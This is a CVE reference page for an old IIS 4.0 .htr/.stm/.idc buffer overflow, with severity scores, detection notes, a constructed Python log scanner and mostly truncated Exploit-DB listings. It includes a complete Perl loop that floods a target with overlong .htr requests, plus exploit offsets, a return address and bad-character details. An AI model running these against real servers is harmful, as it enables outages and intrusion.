CVE-1999-0874
Published 1999-06-16

CVE-1999-0874: Buffer overflow in IIS 4.0 allows remote attackers to cause a denial of service via a malformed request for files with .HTR, .IDC, or .STM extensions.

Priority: P350 · Severity: critical · CVSS 2.0 base score: 10 · Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit available · EPSS: 78.10% (99.5th percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_information_server | — | — |
| microsoft | windows_nt | — | — |
Detection & IOCs (extracted from sources)
- Detect HTTP GET requests to IIS with extremely long path segments (>593 bytes) ending in .htr, .stm, or .idc; this is characteristic of the buffer overflow trigger.
- Alert on HTTP GET requests where the URI contains 593+ repeated characters followed by .htr; this matches the known exploit offset for NT4 SP3/SP4.
- Look for HTTP requests to .htr files with alphanumeric-only payloads of ~2048 bytes in the URI path; the Metasploit module uses alphanumeric encoding with no NOP sled.
- Flag HTTP GET requests where the URI path length exceeds 2500 characters and ends with .htr; the Perl PoC iterates from 2500 to 3500 bytes.
- Detect the return address 0x77f8f0 (NTDLL.DLL jmp gadget) embedded at byte offset 598 within the HTTP request buffer; this is used by the Greg Hoglund exploit variant.
- The exploit offset varies by NT4 service pack level: SP3 and SP4 use offset 593, SP5 uses offset 589. Return addresses also differ per SP.
- All bytes outside the alphanumeric range (0x00–0x2f, 0x3a–0x40, 0x5b–0x60, 0x7b–0xff) are bad characters for the payload, because ISM.DLL filters its input.
- Using EXITFUNC=seh allows the server to continue processing requests but causes issues terminating a bind shell; EXITFUNC=thread causes a server crash on bind shell exit.
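A detection routine that applies the length and shape thresholds from the notes above to HTTP request lines, added here as an example; it is not from the page's sources or from any of the listed exploits, and it generalizes the notes slightly by checking all three server-side extensions. The sample request lines are constructed and the finding tag names are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Thresholds are the ones quoted in the detection notes; the rule set itself is constructed here.
OVERFLOW_OFFSET = 593            # NT4 SP3/SP4 overflow offset from the notes
POC_MIN_LEN = 2500               # lower bound of the Perl PoC loop
SUSPECT_EXTS = (".htr", ".stm", ".idc")
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
ALNUM_ONLY = re.compile(r"^[A-Za-z0-9]+$")
REPEATED = re.compile(r"(.)\1{%d,}" % (OVERFLOW_OFFSET - 1))   # 593+ identical chars

def analyze_request_line(line):
    """Return finding tags for one HTTP request line; [] when nothing matches."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return []
    path = unquote(urlsplit(m.group("target")).path).lower()   # drop query, decode %xx
    ext = next((e for e in SUSPECT_EXTS if path.endswith(e)), None)
    if ext is None:
        return []                                    # not a server-side processed type
    segment = path.rsplit("/", 1)[-1]                # last path component incl. extension
    stem = segment[: -len(ext)]
    findings = []
    if len(segment) > OVERFLOW_OFFSET:
        findings.append("long_segment")              # longer than the known overflow offset
    if ext == ".htr" and REPEATED.search(stem):
        findings.append("repeated_char_htr")         # 593+ repeated chars before .htr
    if ext == ".htr" and len(stem) >= OVERFLOW_OFFSET and ALNUM_ONLY.match(stem):
        findings.append("alnum_only_htr")            # oversized, alphanumeric-only .htr path
    if ext == ".htr" and len(path) > POC_MIN_LEN:
        findings.append("poc_length_range")          # inside the Perl PoC's 2500..3500 range
    return findings

def scan_log(lines):
    """Return [(line number, findings)] for every request line that raised a finding."""
    return [(n, f) for n, f in ((n, analyze_request_line(l)) for n, l in enumerate(lines, 1)) if f]

# Constructed sample request lines (not captured traffic).
SAMPLE_LOG = [
    "GET /default.htr HTTP/1.0",
    "GET /index.stm HTTP/1.1",
    "GET /" + "a" * 600 + ".htr HTTP/1.0",
    "GET /" + "A" * 600 + ".idc HTTP/1.0",
    "GET /" + "b" * 2600 + ".htr HTTP/1.0",
]

if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print(n, f)
```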
No detection rules found.
Exploit-DB: Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit) · 2010-04-30
---
```ruby
##
# $Id: ms02_018_htr.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft IIS 4.0 .HTR Path Overflow',
      'Description' => %q{
        This exploits a buffer overflow in the ISAPI ISM.DLL used to
        process HTR scripting in IIS 4.0. This module works against
        Windows NT 4 Service Packs 3, 4, and 5. The server will
        continue to process requests until the payload being
        executed has exited. If you've set EXITFUNC to 'seh', the
        server will continue
```
Exploit-DB: Microsoft IIS 4.0 - Remote Buffer Overflow (3) · 1999-06-15
---
Source: https://www.securityfocus.com/bid/307/info
Microsoft IIS is reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server-side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.

IIS supports a number of file extensions that require further processing. When a request is made for one of these types of files, a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLLs while handling .HTR, .STM or .IDC extensions.
```c
/* iis 4.0 exploit
 * by eeye security
 *
 * ported to unix/C by the teso crew.
 *
 * shoutouts to #hax and everyone else knowing us...
 * you know who you are.
 *
 * gcc -
```
Exploit-DB: Microsoft IIS 4.0 - Remote Buffer Overflow (2) · 1999-06-15
---
Source: https://www.securityfocus.com/bid/307/info
```ruby
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown
```
Exploit-DB: Microsoft IIS 4.0 - Remote Buffer Overflow (1) · 1999-06-15
---
Source: https://www.securityfocus.com/bid/307/info
Use the following script to test your site:

```perl
#!/usr/bin/perl
# Requests .htr paths of increasing length (2500..3500 bytes) from the host
# given as the first argument, printing each length as it goes.
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
    warn "$i\n";
    get "http://$ARGV[0]/" . ('a' x $i) . ".htr";
}
```
Exploit-DB: Microsoft IIS 4.0 - Remote Buffer Overflow (4) · 1999-06-15
---
Source: https://www.securityfocus.com/bid/307/info
```c
// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// Thi
```
Metasploit: MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have trouble terminating a bind shell. If you set EXITFUNC to thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters.
No writeups or analysis indexed.
References
- http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ234905
- http://www.ciac.org/ciac/bulletins/j-048.shtml
- http://www.eeye.com/html/Research/Advisories/AD06081999.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-019
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A915